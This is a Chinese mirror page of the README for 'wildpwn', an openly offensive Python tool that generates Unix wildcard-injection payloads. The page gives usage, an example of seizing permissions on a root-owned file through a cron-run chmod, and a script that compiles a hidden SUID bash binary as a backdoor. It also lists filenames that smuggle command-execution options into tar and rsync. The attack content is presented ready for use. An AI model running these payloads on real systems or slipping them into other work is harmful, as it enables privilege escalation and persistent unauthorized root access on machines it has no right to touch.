云主机>> wildpwn>> 返回
项目作者: localh0t

项目描述 :
unix wildcard attacks
高级语言: Python
项目地址: git://github.com/localh0t/wildpwn.git
创建时间: 2015-06-29T01:13:37Z
项目社区:https://github.com/localh0t/wildpwn
开源协议:GNU General Public License v3.0
下载


First things first!

Read: https://www.exploit-db.com/papers/33930/


Basic usage

It goes something like this:

  1. usage: wildpwn.py [-h] [--file FILE] payload folder
  3. Tool to generate unix wildcard attacks
  5. positional arguments:
  6.   payload      Payload to use: (combined | tar | rsync)
  7.   folder       Where to write the payloads
  9. optional arguments:
  10.   -h, --help   show this help message and exit
  11.   --file FILE  Path to file for taking ownership / change permissions. Use it
  12.                with combined attack only.


Payload types

  • combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
  • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.


Usage example

  1. $ ls -lh /tmp/very_secret_file
  2. -rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file
  4. $ ls -lh ./pwn_me/
  5. drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
  6. [...]
  7. -rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
  8. -rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
  9. [...]
  11. $ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
  12. [!] Selected payload: combined
  13. [+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!
  15. [...time passes / some cron gets executed...]
  17. # chmod 000 * (for example)
  19. [...back with the unprivileged user...]
  21. $ ls -lha ./pwn_me/
  22. [...]
  23. -rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
  24. -rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
  25. [...]
  27. $ ls -lha /tmp/very_secret_file
  28. -rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file


Bash scripts used on tar/rsync attacks

  1. #!/bin/sh
  3. # get current user uid / gid
  4. CURR_UID="$(id -u)"
  5. CURR_GID="$(id -g)"
  7. # save file
  8. cat > .cachefile.c << EOF
  9. #include <stdio.h>
  10. int main()
  11. {
  12. setuid($CURR_UID);
  13. setgid($CURR_GID);
  14. execl("/bin/bash", "-bash", NULL);
  15. return 0;
  16. }
  17. EOF
  19. # make folder where the payload will be saved
  20. mkdir .cache
  21. chmod 755 .cache
  23. # compile & give SUID
  24. gcc -w .cachefile.c -o .cache/.cachefile
  25. chmod 4755 .cache/.cachefile

Clean up (tar)

  1. # clean up
  2. rm -rf ./'--checkpoint=1'
  3. rm -rf ./'--checkpoint-action=exec=sh .webscript'
  4. rm -rf .webscript
  5. rm -rf .cachefile.c

Clean up (rsync)

  1. # clean up
  2. rm -rf ./'-e sh .syncscript'
  3. rm -rf .syncscript
  4. rm -rf .cachefile.c


Feel free to change them!